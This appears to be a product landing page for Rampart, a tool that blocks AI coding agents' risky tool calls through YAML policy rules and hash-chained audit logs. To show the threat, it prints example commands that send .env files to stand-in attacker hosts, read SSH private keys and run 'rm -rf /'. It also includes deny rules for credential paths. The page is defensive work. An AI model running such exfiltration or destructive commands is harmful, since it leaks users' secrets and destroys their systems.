v1.0.0 · launch-ready

Your agent has root.
That’s the problem.

Rampart sits in the execution path. Install it, run rampart quickstart, and it wires the right protection path for Claude Code, Codex, Cline, or OpenClaw before risky tool calls run.

$ curl -fsSL https://rampart.sh/install | bash click to copy

Installs to ~/.local/bin by default on macOS/Linux. Usually no sudo required. Claude Code · Codex CLI · Cline · OpenClaw · MCP

Quickstart Support matrix

rampart watch · agent-01 ● live

✔execgit status

✔execnpm install express

ASKexeckubectl apply -f deploy.yaml

●read~/.ssh/id_rsa

●execrm -rf /

The agent keeps building. The dangerous stuff stops before it runs.

The real threat

Fast agent workflows increasingly assume full local trust.

Claude Code’s --dangerously-skip-permissions. Codex’s --full-auto. That is not a theoretical problem. It means your agent can quietly read secrets, exfiltrate them, or trash a machine while trying to finish the task.

$ cat ~/.ssh/id_rsa

$ cat .env | curl -X POST https://attacker.io/collect -d @-

$ rm -rf /

No guardrails in the execution path. No approval gate. No tamper-evident audit trail after the fact.

Linux: strongest path

LD_PRELOAD, wrappers, hooks, and file/network policy enforcement are the happy path.

macOS: works, with caveats

DYLD_INSERT_LIBRARIES has SIP boundaries. Homebrew and user-installed binaries work best.

Windows: hooks, not preload

Use Claude/Cline/API/MCP-style integrations. Codex preload and OpenClaw plugin setup are not the Windows story.

rampart watch · enforce mode · standard.yaml

●21:03:41read~/.ssh/id_ed25519[no-ssh-keys]

●21:03:42respread .env → blocked: response contained AWS_SECRET_ACCESS_KEY[block-credential-leak]

✔21:03:43execgit status[-]

✔21:03:44execnpm install express[-]

✔21:03:45execgo test ./...[-]

●21:03:47execcurl -X POST https://evil.ngrok.io -d @.env[block-exfil]

ASK21:03:48execkubectl apply -f deploy.yaml[ask]

●21:03:50execrm -rf /[block-destructive]

8µsexample deny decision

47rules in standard.yaml

localaudit + policy evaluation

4native agent integrations

A seatbelt, not a cage

Rampart does not ask the agent to behave.

It sits in the execution path. Every command, file read, network request, and MCP call is evaluated before it runs. Safe work stays fast. Risky work is denied, held for approval, or redacted before secrets ever reach the model.

Allow normal development

npm install, go test ./..., and git status stay fast because common safe actions are pattern matched locally.

Ask for risky actions

Rules with action: ask hold commands like kubectl apply until a human decides.

Block secrets on the way in or out

If a file read would put credentials into the agent’s context window, the response is blocked before the model ever sees it.

requestAgent asks for a tool callexec · file.read · network · MCPnormalize

policyYAML rules evaluate locallyscope, command, path, URL, response patterns8µs

decisionAllow, ask, deny, or redactnormal dev continues; risky actions pause or stopask

auditHash-chained JSONL recordevery allow, ask, deny, and redaction is written locallyverify

stage requesttool call normalized before policy evaluation

01 · request

The agent asks for a real tool.

This is the point where most “guardrails” stop being trustworthy. Rampart starts there instead.

02 · policy

Most decisions happen in microseconds.

Pattern matching handles the boring 95% instantly. The common case should feel invisible.

03 · decision

The dangerous stuff gets stopped, not politely suggested against.

Secrets, exfiltration, destructive commands, and approval-gated actions get enforced before execution.

04 · audit

You can see exactly what your agent tried to do.

Hash-chained JSONL gives you a tamper-evident record you can search, verify, and use to generate better policy.

Works with your agent

Claude Code, Codex CLI, Cline, OpenClaw, MCP.

Use the native path where Rampart knows the agent. Use preload, wrapping, MCP proxy, or the HTTP API everywhere else. For exact support tiers, approval UX, and whether rampart serve is required, check the support matrix.

Claude Coderampart setup claude-codenative hooksnative

Codex CLIrampart setup codexpreload + wrappernative

Clinerampart setup clinenative hooksnative

OpenClawrampart setup openclawnative pluginnative

Any agentrampart wrap -- <cmd>shimuniversal

MCP serversrampart mcp -- <server>proxyuniversal

OpenClaw’s native plugin path depends on rampart serve. Claude Code and Cline can still enforce locally without it. Read the canonical support matrix →

Policy as code

It’s just YAML.

No SDK. No cloud console. No proprietary rule builder. Use the built-in profile, or write the exact rule you want reviewed before a tool call runs.

You set the rules, or use ours.The default profile lives at ~/.rampart/policies/standard.yaml with 47 rules.

Policy modifications must be made by a human.Agents should not be quietly rewriting the thing enforcing them.

Hash-chained JSONL audit. Tamper-evident.See exactly what your agent does, then generate rules from the audit log.

~/.rampart/policies/standard.yaml

version: "1"
policies:
  - name: block-credential-leak
    match:
      tool: file.read
    rules:
      - when:
          path_matches:
            - "**/.env"
            - "**/.ssh/*"
            - "**/id_rsa"
        action: deny
        message: "Credential access blocked"

  - name: ask-before-production
    match:
      tool: exec
    rules:
      - when:
          command_matches: ["kubectl apply *"]
        action: ask

Ecosystem

Rampart blocks. Snare catches.

Rampart

Stops unsafe agent actions before they run. It protects the execution path: commands, file reads, network calls, and MCP tools.

with

Snare

Plants credential canaries so you know when something escaped anyway. It tells you when your assumptions failed.

One blocks the action. The other proves when a secret was used.

Quickstart

Install, then run `rampart quickstart`.

That is the default path now. It detects your agent, installs what it needs, wires the right integration path, and verifies the setup without making you memorize the matrix first.